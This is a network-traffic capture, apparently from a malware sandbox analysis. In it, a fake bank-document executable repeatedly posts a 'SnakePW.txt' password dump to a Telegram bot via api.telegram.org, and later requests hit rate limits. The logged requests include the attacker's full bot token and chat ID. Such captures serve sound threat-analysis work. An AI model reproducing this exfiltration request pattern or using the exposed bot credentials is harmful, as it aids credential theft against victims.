                                      2024-09-26 09:00:45 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 63 62 65 30 33 35 33 32 35 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcecbe03532505Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:46 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:46 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:46 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 34 35 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35857,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341245,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      58192.168.2.449807149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:46 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dceedce971c962
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:46 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 65 64 63 65 39 37 31 63 39 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dceedce971c962Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:47 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:47 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:47 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 34 37 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35858,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341247,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      59192.168.2.449808149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:47 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcef39c6ad8204
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:47 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 33 39 63 36 61 64 38 32 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcef39c6ad8204Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:48 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:48 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:48 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 34 38 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35859,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341248,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      60192.168.2.449809149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:48 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcef7eb6b6afe8
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:48 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 37 65 62 36 62 36 61 66 65 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcef7eb6b6afe8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:49 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:49 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:49 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 34 39 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35860,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341249,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      61192.168.2.449810149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:49 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcefe818514343
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:49 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 65 38 31 38 35 31 34 33 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcefe818514343Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:50 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:50 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 34
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:50 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 34 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 34","parameters":{"retry_after":34}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      62192.168.2.449811149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:50 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf03db3dd61da
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:50 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 30 33 64 62 33 64 64 36 31 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf03db3dd61daContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:51 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:51 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 33
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:51 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 33 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 33","parameters":{"retry_after":33}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      63192.168.2.449812149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:51 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf09d185123c2
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:51 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 30 39 64 31 38 35 31 32 33 63 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf09d185123c2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:52 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:52 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 32
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:52 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 32 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 32","parameters":{"retry_after":32}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      64192.168.2.449813149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:52 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf0f40df942c2
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:52 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 30 66 34 30 64 66 39 34 32 63 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf0f40df942c2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:53 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:53 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 31
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:53 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 31 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 31 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 31","parameters":{"retry_after":31}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      65192.168.2.449814149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
